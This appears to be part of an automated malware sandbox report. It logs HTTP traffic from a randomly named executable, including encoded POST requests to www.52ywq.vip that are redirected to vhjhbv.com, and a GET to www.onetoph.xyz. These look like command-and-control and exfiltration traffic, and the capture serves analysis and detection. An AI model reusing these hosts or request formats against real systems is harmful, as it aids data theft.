                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                              Sep 24, 2024 11:30:18.090086937 CEST1289INData Raw: 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 43 75 73 74 6f 6d 69 7a 65 64 20 42 6f 6f 74 73 74 72 61 70 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20
                                              Data Ascii: l.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet"></head><body>
                                              Sep 24, 2024 11:30:18.090101957 CEST1289INData Raw: 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 22 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d 62 73 2d 74 61 72 67 65 74 3d 22 23 6e 61 76
                                              Data Ascii: ype="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id
                                              Sep 24, 2024 11:30:18.090114117 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 20 72 6f 75 6e 64 65 64 2d 30 20 6d 2d 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: <div class="dropdown-menu rounded-0 m-0"> <a href="testimonial.html" class="dropdown-item">Testimonial</a> <a href="404.html" class="dropdown-item active">404 Error</a
                                              Sep 24, 2024 11:30:18.090311050 CEST1289INData Raw: 79 20 61 63 74 69 76 65 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 34 30 34 20 45 72 72 6f 72 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6f 6c 3e 0d 0a 20 20 20 20 20
                                              Data Ascii: y active" aria-current="page">404 Error</li> </ol> </nav> </div> <div class="col-md-6 animated fadeIn"> <img class="img-fluid" src="img/header
                                              Sep 24, 2024 11:30:18.090363026 CEST1289INData Raw: 65 72 74 79 20 54 79 70 65 20 33 3c 2f 6f 70 74 69 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 6c 65 63 74 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: erty Type 3</option> </select> </div> <div class="col-md-4"> <select class="form-select border-0 py-3">
                                              Sep 24, 2024 11:30:18.090568066 CEST1289INData Raw: 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 64 69 73 70 6c 61 79 2d 31 22 3e 34 30 34 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6d 62 2d 34 22 3e 50 61 67 65 20 4e 6f
                                              Data Ascii: <h1 class="display-1">404</h1> <h1 class="mb-4">Page Not Found</h1> <p class="mb-4">Were sorry, the page you have looked for does not exist in our website! Maybe go to our home page or try
                                              Sep 24, 2024 11:30:18.090615034 CEST1289INData Raw: 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 6c 69 67 68 74 20 62 74 6e 2d 73 6f 63 69 61 6c
                                              Data Ascii: "></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-facebook-f"></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-youtube"></i></
                                              Sep 24, 2024 11:30:18.090627909 CEST1289INData Raw: 69 6d 67 2d 66 6c 75 69 64 20 72 6f 75 6e 64 65 64 20 62 67 2d 6c 69 67 68 74 20 70 2d 31 22 20 73 72 63 3d 22 69 6d 67 2f 70 72 6f 70 65 72 74 79 2d 31 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: img-fluid rounded bg-light p-1" src="img/property-1.jpg" alt=""> </div> <div class="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/propert
                                              Sep 24, 2024 11:30:18.090640068 CEST1289INData Raw: 6f 72 20 61 6d 65 74 20 73 69 74 20 6a 75 73 74 6f 20 61 6d 65 74 20 65 6c 69 74 72 20 63 6c 69 74 61 20 69 70 73 75 6d 20 65 6c 69 74 72 20 65 73 74 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                              Data Ascii: or amet sit justo amet elitr clita ipsum elitr est.</p> <div class="position-relative mx-auto" style="max-width: 400px;"> <input class="form-control bg-transparent w-100 py-3 ps-4 pe-5" typ


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              61192.168.11.3049954209.74.95.29804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:30:20.609572887 CEST491OUTGET /h5ax/?Nze=C0klVT&7LY=n2I933S2b2mTz9MH4ovHwta6aGzwDUSLbibwCM+kpCP4ce0V2B3v1/0mQi7obzyu6tSS6Xr/MEeQSasqmevZ/lWReC/hsjnmM5iDoTysJMz5ecITkOwwomo= HTTP/1.1
                                              Host: www.onetoph.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:30:20.788508892 CEST1289INHTTP/1.1 404 Not Found
                                              Date: Tue, 24 Sep 2024 09:30:20 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 13928
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                              Sep 24, 2024 11:30:20.788628101 CEST1289INData Raw: 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 43 75 73 74 6f 6d 69 7a 65 64 20 42 6f 6f 74 73 74 72 61 70 20 53 74 79 6c 65
                                              Data Ascii: ets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet"></head
                                              Sep 24, 2024 11:30:20.788645029 CEST1289INData Raw: 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 22 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d
                                              Data Ascii: <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navb
                                              Sep 24, 2024 11:30:20.788662910 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 20 72 6f 75 6e 64 65 64 2d 30 20 6d 2d 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: <div class="dropdown-menu rounded-0 m-0"> <a href="testimonial.html" class="dropdown-item">Testimonial</a> <a href="404.html" class="dropdown-item activ
                                              Sep 24, 2024 11:30:20.788675070 CEST1289INData Raw: 62 2d 69 74 65 6d 20 74 65 78 74 2d 62 6f 64 79 20 61 63 74 69 76 65 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 34 30 34 20 45 72 72 6f 72 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: b-item text-body active" aria-current="page">404 Error</li> </ol> </nav> </div> <div class="col-md-6 animated fadeIn"> <img class="img-fluid"
                                              Sep 24, 2024 11:30:20.788686037 CEST1289INData Raw: 20 76 61 6c 75 65 3d 22 33 22 3e 50 72 6f 70 65 72 74 79 20 54 79 70 65 20 33 3c 2f 6f 70 74 69 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 6c 65 63 74 3e 0d 0a 20 20
                                              Data Ascii: value="3">Property Type 3</option> </select> </div> <div class="col-md-4"> <select class="form-select border-0 py-3">
                                              Sep 24, 2024 11:30:20.788892031 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 64 69 73 70 6c 61 79 2d 31 22 3e 34 30 34 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73
                                              Data Ascii: <h1 class="display-1">404</h1> <h1 class="mb-4">Page Not Found</h1> <p class="mb-4">Were sorry, the page you have looked for does not exist in our website! Maybe go to our h
                                              Sep 24, 2024 11:30:20.789020061 CEST1289INData Raw: 22 66 61 62 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 6c
                                              Data Ascii: "fab fa-twitter"></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-facebook-f"></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-
                                              Sep 24, 2024 11:30:20.789041042 CEST1289INData Raw: 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 67 2d 66 6c 75 69 64 20 72 6f 75 6e 64 65 64 20 62 67 2d 6c 69 67 68 74 20 70 2d 31 22 20 73 72 63 3d 22 69 6d 67 2f 70 72 6f 70 65 72 74 79 2d 31 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0d 0a 20
                                              Data Ascii: <img class="img-fluid rounded bg-light p-1" src="img/property-1.jpg" alt=""> </div> <div class="col-4"> <img class="img-fluid rounded bg-light p-1" s
                                              Sep 24, 2024 11:30:20.789052963 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 3c 70 3e 44 6f 6c 6f 72 20 61 6d 65 74 20 73 69 74 20 6a 75 73 74 6f 20 61 6d 65 74 20 65 6c 69 74 72 20 63 6c 69 74 61 20 69 70 73 75 6d 20 65 6c 69 74 72 20 65 73 74 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: <p>Dolor amet sit justo amet elitr clita ipsum elitr est.</p> <div class="position-relative mx-auto" style="max-width: 400px;"> <input class="form-control bg-transparent w-100 py-3
                                              Sep 24, 2024 11:30:20.789227009 CEST1261INData Raw: 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36
                                              Data Ascii: </a> </div> <div class="col-md-6 text-center text-md-end"> <div class="footer-menu"> <a href="">Home</a>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              62192.168.11.304995613.76.137.44804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:30:26.154400110 CEST752OUTPOST /s4uc/ HTTP/1.1
                                              Host: www.52ywq.vip
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.52ywq.vip
                                              Referer: http://www.52ywq.vip/s4uc/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 46 6e 31 64 74 6d 63 42 79 71 65 4a 57 2b 58 4c 34 65 71 4a 6f 45 35 54 61 31 59 30 38 62 48 42 64 38 74 38 53 79 56 30 51 48 38 36 68 42 63 51 53 71 44 78 6b 38 77 37 62 53 33 4b 44 59 69 6d 57 71 77 45 43 69 78 49 34 78 4e 52 42 41 73 2f 42 32 6e 36 64 34 4a 65 6b 2f 53 4b 39 46 7a 55 77 74 6f 51 43 58 75 57 75 49 55 76 38 47 68 70 2b 71 6d 64 36 75 71 37 7a 64 46 47 4f 62 63 75 49 55 46 4d 2f 56 76 6d 6d 6a 69 74 58 61 59 4e 4c 4a 79 33 58 46 77 56 73 5a 61 37 47 2f 69 53 6e 2f 76 4a 38 61 6f 4d 58 59 71 6b 75 4d 72 36 6b 61 6a 6a 4f 38 52 33 47 49 72 70 6a 6a 66 4a 2f 41 3d 3d
                                              Data Ascii: 7LY=Fn1dtmcByqeJW+XL4eqJoE5Ta1Y08bHBd8t8SyV0QH86hBcQSqDxk8w7bS3KDYimWqwECixI4xNRBAs/B2n6d4Jek/SK9FzUwtoQCXuWuIUv8Ghp+qmd6uq7zdFGObcuIUFM/VvmmjitXaYNLJy3XFwVsZa7G/iSn/vJ8aoMXYqkuMr6kajjO8R3GIrpjjfJ/A==
                                              Sep 24, 2024 11:30:26.675681114 CEST359INHTTP/1.1 301 Moved Permanently
                                              Date: Tue, 24 Sep 2024 09:30:26 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Location: https://6329.vhjhbv.com/s4uc/
                                              Server: CDNRay
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              63192.168.11.304995713.76.137.44804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:30:29.041012049 CEST772OUTPOST /s4uc/ HTTP/1.1
                                              Host: www.52ywq.vip
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.52ywq.vip
                                              Referer: http://www.52ywq.vip/s4uc/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 46 6e 31 64 74 6d 63 42 79 71 65 4a 45 75 6e 4c 2b 50 71 4a 75 6b 35 53 48 46 59 30 6e 4c 48 46 64 38 70 38 53 7a 41 70 52 31 49 36 68 6c 51 51 54 6f 6e 78 6a 38 77 37 56 79 33 44 4e 34 69 39 57 71 38 4d 43 67 31 49 34 78 4a 52 42 46 49 2f 42 42 7a 35 63 6f 4a 6d 74 66 53 49 2b 31 7a 55 77 74 6f 51 43 58 54 78 75 49 63 76 38 32 52 70 2b 50 53 65 35 75 71 34 6b 74 46 47 66 72 63 31 49 55 46 55 2f 52 76 59 6d 67 4b 74 58 66 30 4e 61 37 4b 77 4d 31 77 58 68 35 61 75 57 2f 2f 4d 72 73 7a 32 37 35 5a 54 58 74 6d 36 76 62 61 67 35 5a 58 68 64 63 74 61 61 4a 47 42 68 68 65 53 69 4a 58 34 57 4a 6a 64 63 56 47 5a 48 58 4e 59 54 6c 37 41 57 71 73 3d
                                              Data Ascii: 7LY=Fn1dtmcByqeJEunL+PqJuk5SHFY0nLHFd8p8SzApR1I6hlQQTonxj8w7Vy3DN4i9Wq8MCg1I4xJRBFI/BBz5coJmtfSI+1zUwtoQCXTxuIcv82Rp+PSe5uq4ktFGfrc1IUFU/RvYmgKtXf0Na7KwM1wXh5auW//Mrsz275ZTXtm6vbag5ZXhdctaaJGBhheSiJX4WJjdcVGZHXNYTl7AWqs=
                                              Sep 24, 2024 11:30:29.574621916 CEST359INHTTP/1.1 301 Moved Permanently
                                              Date: Tue, 24 Sep 2024 09:30:29 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Location: https://6329.vhjhbv.com/s4uc/
                                              Server: CDNRay
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              64192.168.11.304995813.76.137.44804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:30:31.930614948 CEST2578OUTPOST /s4uc/ HTTP/1.1
                                              Host: www.52ywq.vip
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.52ywq.vip
                                              Referer: http://www.52ywq.vip/s4uc/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 46 6e 31 64 74 6d 63 42 79 71 65 4a 45 75 6e 4c 2b 50 71 4a 75 6b 35 53 48 46 59 30 6e 4c 48 46 64 38 70 38 53 7a 41 70 52 31 51 36 67 57 59 51 53 49 62 78 69 38 77 37 4c 69 33 4f 4e 34 6a 6e 57 71 6b 49 43 67 6f 2f 34 79 68 52 4f 44 55 2f 49 51 7a 35 46 59 4a 6d 76 66 53 4e 39 46 7a 42 77 74 34 71 43 58 6a 78 75 49 63 76 38 31 4a 70 35 61 6d 65 32 4f 71 37 7a 64 46 61 4f 62 64 37 49 55 4e 45 2f 52 72 49 6d 6a 71 74 58 73 4d 4e 50 59 79 77 4d 31 77 58 37 70 61 74 57 2f 7a 4a 72 73 72 69 37 39 45 73 58 5a 57 36 73 50 6a 58 67 6f 66 72 50 2b 6c 33 54 4a 66 36 68 7a 4f 2f 69 2b 66 6a 52 6f 50 6a 4e 52 4f 68 4c 53 49 4d 58 77 72 39 44 50 42 76 34 44 74 53 46 63 4c 48 6c 6d 58 36 37 2f 62 55 6c 35 63 4a 34 70 38 2f 78 51 44 6a 43 4b 70 30 41 46 4e 51 2f 53 79 42 6e 77 31 59 64 2f 63 67 6d 43 73 53 67 7a 57 44 5a 35 39 58 6e 42 77 47 68 6b 34 54 73 4f 57 49 64 75 6d 54 6e 31 55 76 6c 55 5a 74 2b 31 71 54 64 6d 5a 6a 73 43 57 59 65 62 67 4d 31 63 43 75 50 37 50 55 52 55 44 78 64 48 73 66 63 48 [TRUNCATED]
                                              Data Ascii: 7LY=Fn1dtmcByqeJEunL+PqJuk5SHFY0nLHFd8p8SzApR1Q6gWYQSIbxi8w7Li3ON4jnWqkICgo/4yhRODU/IQz5FYJmvfSN9FzBwt4qCXjxuIcv81Jp5ame2Oq7zdFaObd7IUNE/RrImjqtXsMNPYywM1wX7patW/zJrsri79EsXZW6sPjXgofrP+l3TJf6hzO/i+fjRoPjNROhLSIMXwr9DPBv4DtSFcLHlmX67/bUl5cJ4p8/xQDjCKp0AFNQ/SyBnw1Yd/cgmCsSgzWDZ59XnBwGhk4TsOWIdumTn1UvlUZt+1qTdmZjsCWYebgM1cCuP7PURUDxdHsfcHZ4Ilk2EwQd0EGiOQIESNA9wg/1RfutSEWZzPOu9DD1/EFO7an4m/z469u8EEctGGb51t1YH7W98muyD/vucBkwTXKe0JJZPhZ6Ux6maceXwx05FJVgngpwBKt93bR1oNM1lXgZI3b/awKdw3B39S9BYcfD2YnA1/kvMyUpKze6hC8LiPyG//2Bcp+umMVJnSir1EbQMm3tGJskTR3Ijolq+TZaczLdNPokwueozqfgNHbDQIPuYE0SQqLkRZwhzVQaRBp7WFfm3etWWPeAEjT0BjGWbMOE1BzH2E/EKnF8/LNESNfzcJYJVC4vQzQKNVX09VHw6v1uDt2SnzloSACGQSJngEEy3jJa8bses/sTEwlBKL4WRPzm+JQdnn5vFk45/VMY43HB/UZeYi2sm51xU8vWTUEa+dTywMP9AT5FcVTMIktT6tc0qPy5RWss63K6KsOi8GfOnqW2bWYU75knJRFvA75gdsT1Dj5JWtBD9VDJKTS5C11hODQRXkuTZ1sBK5JJUmYoz1EgRJSFm7jM+UcMZ/KjGP9l4drAg120v55nmeUfjv13OHXRXkqV9G6HD8Lno+JsuWGDNkcfqNL7Z7W09WZD/QcQ2iOktIDKgfVMcS8Jqxm3gmNI50F4P+L1yK6YvdMzgDL2lqtad1v0o3W9Stk2NbMU [TRUNCATED]
                                              Sep 24, 2024 11:30:31.930636883 CEST1289OUTData Raw: 2b 78 74 53 4b 2b 39 64 46 4a 31 6c 4d 58 51 4c 4d 78 4c 50 37 52 7a 32 78 69 59 34 2b 58 54 76 39 44 36 4a 4b 56 72 64 69 74 70 4d 75 57 67 7a 39 38 34 31 42 7a 76 51 4f 50 4f 4e 38 53 63 59 57 55 4c 67 74 6a 67 32 79 46 2f 6a 53 73 46 2b 6d 30
                                              Data Ascii: +xtSK+9dFJ1lMXQLMxLP7Rz2xiY4+XTv9D6JKVrditpMuWgz9841BzvQOPON8ScYWULgtjg2yF/jSsF+m00HwyDu8Hnp7uAwAYIYRfpS3Y2ut3Go/5yXLKiP+U5sJ1ZctqhohyyxDEKm74h+0tMdnxjQCD/a61uL3L1hPbxe3ld3hG5R5fI7nl1cCkV2rXXaNf0piZNc/tHY9kfroKJA4UoosAqh4Um72+UDWQt6+qkXRlEpmZp
                                              Sep 24, 2024 11:30:31.930702925 CEST22OUTData Raw: 75 64 33 44 65 67 38 52 34 75 37 34 6e 6e 33 4d 6e 55 46 51 3d 3d
                                              Data Ascii: ud3Deg8R4u74nn3MnUFQ==
                                              Sep 24, 2024 11:30:32.464014053 CEST359INHTTP/1.1 301 Moved Permanently
                                              Date: Tue, 24 Sep 2024 09:30:32 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Location: https://6329.vhjhbv.com/s4uc/
                                              Server: CDNRay
